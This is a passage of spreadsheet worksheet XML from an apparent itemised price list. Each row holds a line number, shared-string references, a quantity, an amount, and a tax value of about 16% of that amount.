    </row>
    <row r="439" spans="2:11">
      <c r="B439" s="9">
        <v>466</v>
      </c>
      <c r="C439" s="238" t="s">
        <v>5756</v>
      </c>
      <c r="D439" s="238" t="s">
        <v>5757</v>
      </c>
      <c r="E439" s="238" t="s">
        <v>5734</v>
      </c>
      <c r="F439" s="9"/>
      <c r="G439" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H439" s="10">
        <v>44</v>
      </c>
      <c r="I439" s="14">
        <v>110.05</v>
      </c>
      <c r="J439" s="15">
        <v>17.6</v>
      </c>
      <c r="K439" s="16"/>
    </row>
    <row r="440" spans="2:11">
      <c r="B440" s="9">
        <v>467</v>
      </c>
      <c r="C440" s="238" t="s">
        <v>5758</v>
      </c>
      <c r="D440" s="238" t="s">
        <v>5759</v>
      </c>
      <c r="E440" s="238" t="s">
        <v>5760</v>
      </c>
      <c r="F440" s="238" t="s">
        <v>5761</v>
      </c>
      <c r="G440" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H440" s="10">
        <v>1</v>
      </c>
      <c r="I440" s="14">
        <v>837.61</v>
      </c>
      <c r="J440" s="15">
        <v>134.0176</v>
      </c>
      <c r="K440" s="16"/>
    </row>
    <row r="441" spans="2:11">
      <c r="B441" s="9">
        <v>468</v>
      </c>
      <c r="C441" s="238" t="s">
        <v>5762</v>
      </c>
      <c r="D441" s="238" t="s">
        <v>5763</v>
      </c>
      <c r="E441" s="238" t="s">
        <v>5764</v>
      </c>
      <c r="F441" s="238" t="s">
        <v>5765</v>
      </c>
      <c r="G441" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H441" s="10">
        <v>1</v>
      </c>
      <c r="I441" s="14">
        <v>235.05</v>
      </c>
      <c r="J441" s="15">
        <v>37.608</v>
      </c>
      <c r="K441" s="16"/>
    </row>
    <row r="442" spans="2:11">
      <c r="B442" s="9">
        <v>469</v>
      </c>
      <c r="C442" s="238" t="s">
        <v>5766</v>
      </c>
      <c r="D442" s="238" t="s">
        <v>5767</v>
      </c>
      <c r="E442" s="238" t="s">
        <v>5768</v>
      </c>
      <c r="F442" s="238" t="s">
        <v>5769</v>
      </c>
      <c r="G442" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H442" s="10">
        <v>3</v>
      </c>
      <c r="I442" s="14">
        <v>1282.05</v>
      </c>
      <c r="J442" s="15">
        <v>205.128</v>
      </c>
      <c r="K442" s="16"/>
    </row>
    <row r="443" spans="2:11">
      <c r="B443" s="9">
        <v>470</v>
      </c>
      <c r="C443" s="238" t="s">
        <v>5770</v>
      </c>
      <c r="D443" s="9"/>
      <c r="E443" s="238" t="s">
        <v>5771</v>
      </c>
      <c r="F443" s="238" t="s">
        <v>5772</v>
      </c>
      <c r="G443" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H443" s="10">
        <v>10</v>
      </c>
      <c r="I443" s="14">
        <v>410.26</v>
      </c>
      <c r="J443" s="15">
        <v>65.648</v>
      </c>
      <c r="K443" s="16"/>
    </row>
    <row r="444" spans="2:11">
      <c r="B444" s="9">
        <v>471</v>
      </c>
      <c r="C444" s="238" t="s">
        <v>5773</v>
      </c>
      <c r="D444" s="9"/>
      <c r="E444" s="238" t="s">
        <v>5774</v>
      </c>
      <c r="F444" s="238" t="s">
        <v>5775</v>
      </c>
      <c r="G444" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H444" s="10">
        <v>3</v>
      </c>
      <c r="I444" s="14">
        <v>76.93</v>
      </c>
      <c r="J444" s="15">
        <v>12.3072</v>
      </c>
      <c r="K444" s="16"/>
    </row>
    <row r="445" spans="2:11">
      <c r="B445" s="9">
        <v>472</v>
      </c>
      <c r="C445" s="238" t="s">
        <v>5776</v>
      </c>
      <c r="D445" s="9"/>
      <c r="E445" s="238" t="s">
        <v>5777</v>
      </c>
      <c r="F445" s="238" t="s">
        <v>5778</v>
      </c>
      <c r="G445" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H445" s="10">
        <v>1</v>
      </c>
      <c r="I445" s="14">
        <v>66.34</v>
      </c>
      <c r="J445" s="15">
        <v>10.6144</v>
      </c>
      <c r="K445" s="16"/>
    </row>
    <row r="446" spans="2:11">
      <c r="B446" s="9">
        <v>473</v>
      </c>
      <c r="C446" s="238" t="s">
        <v>5779</v>
      </c>
      <c r="D446" s="9"/>
      <c r="E446" s="238" t="s">
        <v>5780</v>
      </c>
      <c r="F446" s="9"/>
      <c r="G446" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H446" s="10">
        <v>1</v>
      </c>
      <c r="I446" s="14">
        <v>415.38</v>
      </c>
      <c r="J446" s="15">
        <v>66.4608</v>
      </c>
      <c r="K446" s="16"/>
    </row>
    <row r="447" spans="2:11">
      <c r="B447" s="9">
        <v>474</v>
      </c>
      <c r="C447" s="238" t="s">
        <v>5781</v>
      </c>
      <c r="D447" s="9"/>
      <c r="E447" s="238" t="s">
        <v>5782</v>
      </c>
      <c r="F447" s="9"/>
      <c r="G447" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H447" s="10">
        <v>1</v>
      </c>
      <c r="I447" s="14">
        <v>8.12</v>
      </c>
      <c r="J447" s="15">
        <v>1.2992</v>
      </c>
      <c r="K447" s="16"/>
    </row>
    <row r="448" spans="2:11">
      <c r="B448" s="9">
        <v>475</v>
      </c>
      <c r="C448" s="238" t="s">
        <v>5783</v>
      </c>
      <c r="D448" s="9"/>
      <c r="E448" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F448" s="9"/>
      <c r="G448" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H448" s="10">
        <v>4</v>
      </c>
      <c r="I448" s="14">
        <v>47.86</v>
      </c>
      <c r="J448" s="15">
        <v>7.6608</v>
      </c>
      <c r="K448" s="16"/>
    </row>
    <row r="449" spans="2:11">
      <c r="B449" s="9">
        <v>476</v>
      </c>
      <c r="C449" s="238" t="s">
        <v>5784</v>
      </c>
      <c r="D449" s="9"/>
      <c r="E449" s="238" t="s">
        <v>5785</v>
      </c>
      <c r="F449" s="9"/>
      <c r="G449" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H449" s="10">
        <v>6</v>
      </c>
      <c r="I449" s="14">
        <v>35.9</v>
      </c>
      <c r="J449" s="15">
        <v>5.7408</v>
      </c>
      <c r="K449" s="16"/>
    </row>
    <row r="450" spans="2:11">
      <c r="B450" s="9">
        <v>477</v>
      </c>
      <c r="C450" s="238" t="s">
        <v>5786</v>
      </c>
      <c r="D450" s="238" t="s">
        <v>5787</v>
      </c>
      <c r="E450" s="238" t="s">
        <v>5788</v>
      </c>
      <c r="F450" s="238" t="s">
        <v>5789</v>
      </c>
      <c r="G450" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H450" s="10">
        <v>2</v>
      </c>
      <c r="I450" s="14">
        <v>1468.19</v>
      </c>
      <c r="J450" s="15">
        <v>234.912</v>
      </c>
      <c r="K450" s="16"/>
    </row>
    <row r="451" spans="2:11">
      <c r="B451" s="9">
        <v>478</v>
      </c>
      <c r="C451" s="238" t="s">
        <v>5790</v>
      </c>
      <c r="D451" s="238" t="s">
        <v>5791</v>
      </c>
      <c r="E451" s="238" t="s">
        <v>5792</v>
      </c>
      <c r="F451" s="238" t="s">
        <v>5793</v>
      </c>
      <c r="G451" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H451" s="10">
        <v>5</v>
      </c>
      <c r="I451" s="14">
        <v>405.01</v>
      </c>
      <c r="J451" s="15">
        <v>64.8</v>
      </c>
      <c r="K451" s="16"/>
    </row>
    <row r="452" spans="2:11">
      <c r="B452" s="9">
        <v>479</v>
      </c>
      <c r="C452" s="238" t="s">
        <v>5794</v>
      </c>
      <c r="D452" s="238" t="s">
        <v>5795</v>
      </c>
      <c r="E452" s="238" t="s">
        <v>5796</v>
      </c>
      <c r="F452" s="238" t="s">
        <v>5797</v>
      </c>
      <c r="G452" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H452" s="10">
        <v>1</v>
      </c>
      <c r="I452" s="14">
        <v>1538.46</v>
      </c>
      <c r="J452" s="15">
        <v>246.1536</v>
      </c>
      <c r="K452" s="16"/>
    </row>
    <row r="453" spans="2:11">
      <c r="B453" s="9">
        <v>480</v>
      </c>
      <c r="C453" s="238" t="s">
        <v>5798</v>
      </c>
      <c r="D453" s="238" t="s">
        <v>5799</v>
      </c>
      <c r="E453" s="238" t="s">
        <v>5800</v>
      </c>
      <c r="F453" s="238" t="s">
        <v>4706</v>
      </c>
      <c r="G453" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H453" s="10">
        <v>2</v>
      </c>
      <c r="I453" s="14">
        <v>2735.04</v>
      </c>
      <c r="J453" s="15">
        <v>437.6064</v>
      </c>
      <c r="K453" s="16"/>
    </row>
    <row r="454" spans="2:11">
      <c r="B454" s="9">
        <v>481</v>
      </c>
      <c r="C454" s="238" t="s">
        <v>5801</v>
      </c>
      <c r="D454" s="238" t="s">
        <v>5802</v>
      </c>
      <c r="E454" s="238" t="s">
        <v>5803</v>
      </c>
      <c r="F454" s="238" t="s">
        <v>5804</v>
      </c>
      <c r="G454" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H454" s="10">
        <v>3</v>
      </c>
      <c r="I454" s="14">
        <v>769.23</v>
      </c>
      <c r="J454" s="15">
        <v>123.0768</v>
      </c>
      <c r="K454" s="16"/>
    </row>
    <row r="455" spans="2:11">
      <c r="B455" s="9">
        <v>482</v>
      </c>
      <c r="C455" s="238" t="s">
        <v>5805</v>
      </c>
      <c r="D455" s="238" t="s">
        <v>5806</v>
      </c>
      <c r="E455" s="238" t="s">
        <v>5807</v>
      </c>
      <c r="F455" s="9"/>
      <c r="G455" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H455" s="10">
        <v>20</v>
      </c>
      <c r="I455" s="14">
        <v>683.76</v>
      </c>
      <c r="J455" s="15">
        <v>109.408</v>
      </c>
      <c r="K455" s="16"/>
    </row>
    <row r="456" spans="2:11">
      <c r="B456" s="9">
        <v>483</v>
      </c>
      <c r="C456" s="238" t="s">
        <v>5808</v>
      </c>
      <c r="D456" s="238" t="s">
        <v>5809</v>
      </c>
      <c r="E456" s="238" t="s">
        <v>5810</v>
      </c>
      <c r="F456" s="238" t="s">
        <v>5811</v>
      </c>
      <c r="G456" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H456" s="10">
        <v>2</v>
      </c>
      <c r="I456" s="14">
        <v>205.13</v>
      </c>
      <c r="J456" s="15">
        <v>32.8224</v>
      </c>
      <c r="K456" s="16"/>
    </row>
    <row r="457" spans="2:11">
      <c r="B457" s="9">
        <v>484</v>
      </c>
      <c r="C457" s="238" t="s">
        <v>5812</v>
      </c>
      <c r="D457" s="238" t="s">
        <v>5813</v>
      </c>
      <c r="E457" s="238" t="s">
        <v>5814</v>
      </c>
      <c r="F457" s="238" t="s">
        <v>5815</v>
      </c>
      <c r="G457" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H457" s="10">
        <v>2</v>
      </c>
      <c r="I457" s="14">
        <v>1021.37</v>
      </c>
      <c r="J457" s="15">
        <v>163.4208</v>
      </c>
      <c r="K457" s="16"/>
    </row>
    <row r="458" spans="2:11">
      <c r="B458" s="9">
        <v>485</v>
      </c>
      <c r="C458" s="238" t="s">
        <v>5816</v>
      </c>
      <c r="D458" s="238" t="s">
        <v>5813</v>
      </c>
      <c r="E458" s="238" t="s">
        <v>5814</v>
      </c>
      <c r="F458" s="238" t="s">
        <v>5817</v>
      </c>
      <c r="G458" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H458" s="10">
        <v>5</v>
      </c>
      <c r="I458" s="14">
        <v>1282.05</v>
      </c>
      <c r="J458" s="15">
        <v>205.128</v>
      </c>
      <c r="K458" s="16"/>
    </row>
    <row r="459" spans="2:11">
      <c r="B459" s="9">
        <v>486</v>
      </c>
      <c r="C459" s="238" t="s">
        <v>5818</v>
      </c>
      <c r="D459" s="9"/>
      <c r="E459" s="238" t="s">
        <v>5819</v>
      </c>
      <c r="F459" s="9"/>
      <c r="G459" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H459" s="10">
        <v>50</v>
      </c>
      <c r="I459" s="14">
        <v>21.37</v>
      </c>
      <c r="J459" s="15">
        <v>3.44</v>
      </c>
      <c r="K459" s="16"/>
    </row>
    <row r="460" spans="2:11">
      <c r="B460" s="9">
        <v>487</v>
      </c>
      <c r="C460" s="238" t="s">
        <v>5820</v>
      </c>
      <c r="D460" s="9"/>
      <c r="E460" s="238" t="s">
        <v>5821</v>
      </c>
      <c r="F460" s="9"/>
      <c r="G460" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H460" s="10">
        <v>1</v>
      </c>
      <c r="I460" s="14">
        <v>102.56</v>
      </c>
      <c r="J460" s="15">
        <v>16.4096</v>
      </c>
      <c r="K460" s="16"/>
    </row>
    <row r="461" spans="2:11">
      <c r="B461" s="9">
        <v>488</v>
      </c>
      <c r="C461" s="238" t="s">
        <v>5822</v>
      </c>
      <c r="D461" s="9"/>
      <c r="E461" s="238" t="s">
        <v>5823</v>
      </c>
      <c r="F461" s="9"/>
      <c r="G461" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H461" s="10">
        <v>1</v>
      </c>
      <c r="I461" s="14">
        <v>119.66</v>
      </c>
      <c r="J461" s="15">
        <v>19.1456</v>
      </c>
      <c r="K461" s="16"/>
    </row>
    <row r="462" spans="2:11">
      <c r="B462" s="9">
        <v>489</v>
      </c>
      <c r="C462" s="238" t="s">
        <v>5824</v>
      </c>
      <c r="D462" s="238" t="s">
        <v>5825</v>
      </c>
      <c r="E462" s="238" t="s">
        <v>1987</v>
      </c>
      <c r="F462" s="238" t="s">
        <v>5826</v>
      </c>
      <c r="G462" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H462" s="10">
        <v>13</v>
      </c>
      <c r="I462" s="14">
        <v>7365.08</v>
      </c>
      <c r="J462" s="15">
        <v>1178.4032</v>
      </c>
      <c r="K462" s="16"/>
    </row>
    <row r="463" spans="2:11">
      <c r="B463" s="9">
        <v>490</v>
      </c>
      <c r="C463" s="238" t="s">
        <v>5827</v>
      </c>
      <c r="D463" s="9"/>
      <c r="E463" s="238" t="s">
        <v>5828</v>
      </c>
      <c r="F463" s="238" t="s">
        <v>5829</v>
      </c>
      <c r="G463" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H463" s="10">
        <v>1</v>
      </c>
      <c r="I463" s="14">
        <v>581.18</v>
      </c>
      <c r="J463" s="15">
        <v>92.9888</v>
      </c>
      <c r="K463" s="16"/>
    </row>
    <row r="464" spans="2:11">
      <c r="B464" s="9">
        <v>491</v>
      </c>
      <c r="C464" s="238" t="s">
        <v>5830</v>
      </c>
      <c r="D464" s="9"/>
      <c r="E464" s="238" t="s">
        <v>5831</v>
      </c>
      <c r="F464" s="238" t="s">
        <v>5832</v>
      </c>
      <c r="G464" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H464" s="10">
        <v>12</v>
      </c>
      <c r="I464" s="14">
        <v>2461.54</v>
      </c>
      <c r="J464" s="15">
        <v>393.8496</v>
      </c>
      <c r="K464" s="16"/>
    </row>
    <row r="465" spans="2:11">
      <c r="B465" s="9">
        <v>492</v>
      </c>
      <c r="C465" s="238" t="s">
        <v>5833</v>
      </c>
      <c r="D465" s="238" t="s">
        <v>5834</v>
      </c>
      <c r="E465" s="238" t="s">
        <v>5835</v>
      </c>
      <c r="F465" s="238" t="s">
        <v>5836</v>
      </c>
      <c r="G465" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H465" s="10">
        <v>1</v>
      </c>
      <c r="I465" s="14">
        <v>153.84</v>
      </c>
      <c r="J465" s="15">
        <v>24.6144</v>
      </c>
      <c r="K465" s="16"/>
    </row>
    <row r="466" spans="2:11">
      <c r="B466" s="9">
        <v>493</v>
      </c>
      <c r="C466" s="238" t="s">
        <v>5837</v>
      </c>
      <c r="D466" s="9"/>
      <c r="E466" s="238" t="s">
        <v>5838</v>
      </c>
      <c r="F466" s="9"/>
      <c r="G466" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H466" s="10">
        <v>1</v>
      </c>
      <c r="I466" s="14">
        <v>2136.75</v>
      </c>
      <c r="J466" s="15">
        <v>341.88</v>
      </c>
      <c r="K466" s="16"/>
    </row>
    <row r="467" spans="2:11">
      <c r="B467" s="9">
        <v>494</v>
      </c>
      <c r="C467" s="238" t="s">
        <v>5839</v>
      </c>
      <c r="D467" s="9"/>
      <c r="E467" s="238" t="s">
        <v>5840</v>
      </c>
      <c r="F467" s="238" t="s">
        <v>5841</v>
      </c>
      <c r="G467" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H467" s="10">
        <v>1</v>
      </c>
      <c r="I467" s="14">
        <v>381.76</v>
      </c>
      <c r="J467" s="15">
        <v>61.0816</v>
      </c>
      <c r="K467" s="16"/>
    </row>
    <row r="468" spans="2:11">
      <c r="B468" s="9">
        <v>495</v>
      </c>
      <c r="C468" s="238" t="s">
        <v>5842</v>
      </c>
      <c r="D468" s="9"/>
      <c r="E468" s="238" t="s">
        <v>5843</v>
      </c>
      <c r="F468" s="238" t="s">
        <v>5844</v>
      </c>
      <c r="G468" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H468" s="10">
        <v>13</v>
      </c>
      <c r="I468" s="14">
        <v>16836.07</v>
      </c>
      <c r="J468" s="15">
        <v>2693.7664</v>
      </c>
      <c r="K468" s="16"/>
    </row>
    <row r="469" spans="2:11">
      <c r="B469" s="9">
        <v>496</v>
      </c>
      <c r="C469" s="238" t="s">
        <v>5845</v>
      </c>
      <c r="D469" s="238" t="s">
        <v>5846</v>
      </c>
      <c r="E469" s="238" t="s">
        <v>5847</v>
      </c>
      <c r="F469" s="9"/>
      <c r="G469" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H469" s="10">
        <v>1</v>
      </c>
      <c r="I469" s="14">
        <v>4102.56</v>
      </c>
      <c r="J469" s="15">
        <v>656.4096</v>
      </c>
      <c r="K469" s="16"/>
    </row>
    <row r="470" spans="2:11">
      <c r="B470" s="9">
        <v>497</v>
      </c>
      <c r="C470" s="238" t="s">
        <v>5848</v>
      </c>
      <c r="D470" s="238" t="s">
        <v>5849</v>
      </c>
      <c r="E470" s="238" t="s">
        <v>5850</v>
      </c>
      <c r="F470" s="238" t="s">
        <v>5851</v>
      </c>
      <c r="G470" s="237" t="s">
        <v>5852</v>
      </c>
      <c r="H470" s="10">
        <v>8</v>
      </c>
      <c r="I470" s="14">
        <v>1367.52</v>
      </c>
      <c r="J470" s="15">
        <v>218.8032</v>
      </c>
      <c r="K470" s="16"/>
    </row>
    <row r="471" spans="2:11">
      <c r="B471" s="9">
        <v>498</v>
      </c>
      <c r="C471" s="238" t="s">
        <v>5853</v>
      </c>
      <c r="D471" s="238" t="s">
        <v>5854</v>
      </c>
      <c r="E471" s="238" t="s">
        <v>5855</v>
      </c>
      <c r="F471" s="238" t="s">
        <v>5856</v>
      </c>
      <c r="G471" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H471" s="10">
        <v>3</v>
      </c>
      <c r="I471" s="14">
        <v>752.91</v>
      </c>
      <c r="J471" s="15">
        <v>120.4656</v>
      </c>
      <c r="K471" s="16"/>
    </row>
    <row r="472" spans="2:11">
      <c r="B472" s="9">
        <v>499</v>
      </c>
      <c r="C472" s="238" t="s">
        <v>5857</v>
      </c>
      <c r="D472" s="238" t="s">
        <v>5858</v>
      </c>
      <c r="E472" s="238" t="s">
        <v>5859</v>
      </c>
      <c r="F472" s="9"/>
      <c r="G472" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H472" s="10">
        <v>7</v>
      </c>
      <c r="I472" s="14">
        <v>1099.36</v>
      </c>
      <c r="J472" s="15">
        <v>175.896</v>
      </c>
      <c r="K472" s="16"/>
    </row>
    <row r="473" spans="2:11">
      <c r="B473" s="9">
        <v>500</v>
      </c>
      <c r="C473" s="238" t="s">
        <v>5860</v>
      </c>
      <c r="D473" s="238" t="s">
        <v>5861</v>
      </c>
      <c r="E473" s="238" t="s">
        <v>5861</v>
      </c>
      <c r="F473" s="9"/>
      <c r="G473" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H473" s="10">
        <v>1</v>
      </c>
      <c r="I473" s="14">
        <v>3162.39</v>
      </c>
      <c r="J473" s="15">
        <v>505.9824</v>
      </c>
      <c r="K473" s="16"/>
    </row>
    <row r="474" spans="2:11">
      <c r="B474" s="9">
        <v>501</v>
      </c>
      <c r="C474" s="238" t="s">
        <v>5862</v>
      </c>
      <c r="D474" s="238" t="s">
        <v>5863</v>
      </c>
      <c r="E474" s="238" t="s">
        <v>5864</v>
      </c>
      <c r="F474" s="9"/>
      <c r="G474" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H474" s="10">
        <v>4</v>
      </c>
      <c r="I474" s="14">
        <v>512.82</v>
      </c>
      <c r="J474" s="15">
        <v>82.0544</v>
      </c>
      <c r="K474" s="16"/>
    </row>
    <row r="475" spans="2:11">
      <c r="B475" s="9">
        <v>502</v>
      </c>
      <c r="C475" s="238" t="s">
        <v>5865</v>
      </c>
      <c r="D475" s="238" t="s">
        <v>5866</v>
      </c>
      <c r="E475" s="238" t="s">
        <v>5867</v>
      </c>
      <c r="F475" s="238" t="s">
        <v>5868</v>
      </c>
      <c r="G475" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H475" s="10">
        <v>1</v>
      </c>
      <c r="I475" s="14">
        <v>555.55</v>
      </c>
      <c r="J475" s="15">
        <v>88.888</v>
      </c>
      <c r="K475" s="16"/>
    </row>
    <row r="476" spans="2:11">
      <c r="B476" s="9">
        <v>503</v>
      </c>
      <c r="C476" s="238" t="s">
        <v>5869</v>
      </c>
      <c r="D476" s="9"/>
      <c r="E476" s="238" t="s">
        <v>5870</v>
      </c>
      <c r="F476" s="9"/>
      <c r="G476" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H476" s="10">
        <v>20</v>
      </c>
      <c r="I476" s="14">
        <v>170.91</v>
      </c>
      <c r="J476" s="15">
        <v>27.36</v>
      </c>
      <c r="K476" s="16"/>
    </row>
    <row r="477" spans="2:11">
      <c r="B477" s="9">
        <v>504</v>
      </c>
      <c r="C477" s="238" t="s">
        <v>5871</v>
      </c>
      <c r="D477" s="238" t="s">
        <v>5872</v>
      </c>
      <c r="E477" s="238" t="s">
        <v>5873</v>
      </c>
      <c r="F477" s="238" t="s">
        <v>5874</v>
      </c>
      <c r="G477" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H477" s="10">
        <v>3</v>
      </c>
      <c r="I477" s="14">
        <v>1521.37</v>
      </c>
      <c r="J477" s="15">
        <v>243.4176</v>
      </c>
      <c r="K477" s="16"/>
    </row>
    <row r="478" spans="2:11">
      <c r="B478" s="9">
        <v>505</v>
      </c>
      <c r="C478" s="238" t="s">
        <v>5875</v>
      </c>
      <c r="D478" s="238" t="s">
        <v>5876</v>
      </c>
      <c r="E478" s="238" t="s">
        <v>5877</v>
      </c>
      <c r="F478" s="238" t="s">
        <v>5878</v>
      </c>
      <c r="G478" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H478" s="10">
        <v>17</v>
      </c>
      <c r="I478" s="14">
        <v>2711.32</v>
      </c>
      <c r="J478" s="15">
        <v>433.8128</v>
      </c>
      <c r="K478" s="16"/>
    </row>
    <row r="479" spans="2:11">
      <c r="B479" s="9">
        <v>506</v>
      </c>
      <c r="C479" s="238" t="s">
        <v>5879</v>
      </c>
      <c r="D479" s="238" t="s">
        <v>5880</v>
      </c>
      <c r="E479" s="238" t="s">
        <v>5881</v>
      </c>
      <c r="F479" s="9"/>
      <c r="G479" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H479" s="10">
        <v>2</v>
      </c>
      <c r="I479" s="14">
        <v>769.23</v>
      </c>
      <c r="J479" s="15">
        <v>123.0784</v>
      </c>
      <c r="K479" s="16"/>
    </row>
    <row r="480" spans="2:11">
      <c r="B480" s="9">
        <v>507</v>
      </c>
      <c r="C480" s="238" t="s">
        <v>5882</v>
      </c>
      <c r="D480" s="238" t="s">
        <v>5883</v>
      </c>
      <c r="E480" s="238" t="s">
        <v>5884</v>
      </c>
      <c r="F480" s="238" t="s">
        <v>5454</v>
      </c>
      <c r="G480" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H480" s="10">
        <v>8</v>
      </c>
      <c r="I480" s="14">
        <v>3050.68</v>
      </c>
      <c r="J480" s="15">
        <v>488.1152</v>
      </c>
      <c r="K480" s="16"/>
    </row>
    <row r="481" spans="2:11">
      <c r="B481" s="9">
        <v>508</v>
      </c>
      <c r="C481" s="238" t="s">
        <v>5885</v>
      </c>
      <c r="D481" s="9"/>
      <c r="E481" s="238" t="s">
        <v>5886</v>
      </c>
      <c r="F481" s="238" t="s">
        <v>5887</v>
      </c>
      <c r="G481" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H481" s="10">
        <v>11</v>
      </c>
      <c r="I481" s="14">
        <v>60.95</v>
      </c>
      <c r="J481" s="15">
        <v>9.7504</v>
      </c>
      <c r="K481" s="16"/>
    </row>
    <row r="482" spans="2:11">
      <c r="B482" s="9">
        <v>509</v>
      </c>
      <c r="C482" s="238" t="s">
        <v>5888</v>
      </c>
      <c r="D482" s="9"/>
      <c r="E482" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F482" s="238" t="s">
        <v>5890</v>
      </c>
      <c r="G482" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H482" s="10">
        <v>1</v>
      </c>
      <c r="I482" s="14">
        <v>1581.2</v>
      </c>
      <c r="J482" s="15">
        <v>252.992</v>
      </c>
      <c r="K482" s="16"/>
    </row>
    <row r="483" spans="2:11">
      <c r="B483" s="9">
        <v>510</v>
      </c>
      <c r="C483" s="238" t="s">
        <v>5891</v>
      </c>
      <c r="D483" s="238" t="s">
        <v>5892</v>
      </c>
      <c r="E483" s="238" t="s">
        <v>5893</v>
      </c>
      <c r="F483" s="9"/>
      <c r="G483" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H483" s="10">
        <v>2</v>
      </c>
      <c r="I483" s="14">
        <v>3076.92</v>
      </c>
      <c r="J483" s="15">
        <v>492.3072</v>
      </c>
      <c r="K483" s="16"/>
    </row>
    <row r="484" spans="2:11">
      <c r="B484" s="9">
        <v>511</v>
      </c>
      <c r="C484" s="238" t="s">
        <v>5894</v>
      </c>
      <c r="D484" s="238" t="s">
        <v>5895</v>
      </c>
      <c r="E484" s="238" t="s">
        <v>5889</v>
      </c>
      <c r="F484" s="238" t="s">
        <v>5896</v>
      </c>
      <c r="G484" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H484" s="10">
        <v>1</v>
      </c>
      <c r="I484" s="14">
        <v>3361.82</v>
      </c>
      <c r="J484" s="15">
        <v>537.8912</v>
      </c>
      <c r="K484" s="16"/>
    </row>
    <row r="485" spans="2:11">
      <c r="B485" s="9">
        <v>512</v>
      </c>
      <c r="C485" s="238" t="s">
        <v>5897</v>
      </c>
      <c r="D485" s="9"/>
      <c r="E485" s="238" t="s">
        <v>5898</v>
      </c>
      <c r="F485" s="9"/>
      <c r="G485" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H485" s="10">
        <v>1</v>
      </c>
      <c r="I485" s="14">
        <v>4586.89</v>
      </c>
      <c r="J485" s="15">
        <v>733.9024</v>
      </c>
      <c r="K485" s="16"/>
    </row>
    <row r="486" spans="2:11">
      <c r="B486" s="9">
        <v>513</v>
      </c>
      <c r="C486" s="238" t="s">
        <v>5899</v>
      </c>
      <c r="D486" s="238" t="s">
        <v>5900</v>
      </c>
      <c r="E486" s="238" t="s">
        <v>5901</v>
      </c>
      <c r="F486" s="238" t="s">
        <v>2916</v>
      </c>
      <c r="G486" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H486" s="10">
        <v>36</v>
      </c>
      <c r="I486" s="14">
        <v>2241.44</v>
      </c>
      <c r="J486" s="15">
        <v>358.6176</v>
      </c>
      <c r="K486" s="16"/>
    </row>
    <row r="487" spans="2:11">
      <c r="B487" s="9">
        <v>514</v>
      </c>
      <c r="C487" s="238" t="s">
        <v>5902</v>
      </c>
      <c r="D487" s="9"/>
      <c r="E487" s="238" t="s">
        <v>5903</v>
      </c>
      <c r="F487" s="238" t="s">
        <v>5904</v>
      </c>
      <c r="G487" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H487" s="10">
        <v>1</v>
      </c>
      <c r="I487" s="14">
        <v>220</v>
      </c>
      <c r="J487" s="15">
        <v>35.2</v>
      </c>
      <c r="K487" s="16"/>
    </row>
    <row r="488" spans="2:11">
      <c r="B488" s="9">
        <v>515</v>
      </c>
      <c r="C488" s="238" t="s">
        <v>5905</v>
      </c>
      <c r="D488" s="9"/>
      <c r="E488" s="238" t="s">
        <v>5734</v>
      </c>
      <c r="F488" s="9"/>
      <c r="G488" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H488" s="10">
        <v>8</v>
      </c>
      <c r="I488" s="14">
        <v>324.77</v>
      </c>
      <c r="J488" s="15">
        <v>51.968</v>
      </c>
      <c r="K488" s="16"/>
    </row>
    <row r="489" spans="2:11">
      <c r="B489" s="9">
        <v>516</v>
      </c>
      <c r="C489" s="238" t="s">
        <v>5906</v>
      </c>
      <c r="D489" s="238" t="s">
        <v>5907</v>
      </c>
      <c r="E489" s="238" t="s">
        <v>5908</v>
      </c>
      <c r="F489" s="238" t="s">
        <v>5909</v>
      </c>
      <c r="G489" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H489" s="10">
        <v>39</v>
      </c>
      <c r="I489" s="14">
        <v>13802.28</v>
      </c>
      <c r="J489" s="15">
        <v>2208.336</v>
      </c>
      <c r="K489" s="16"/>
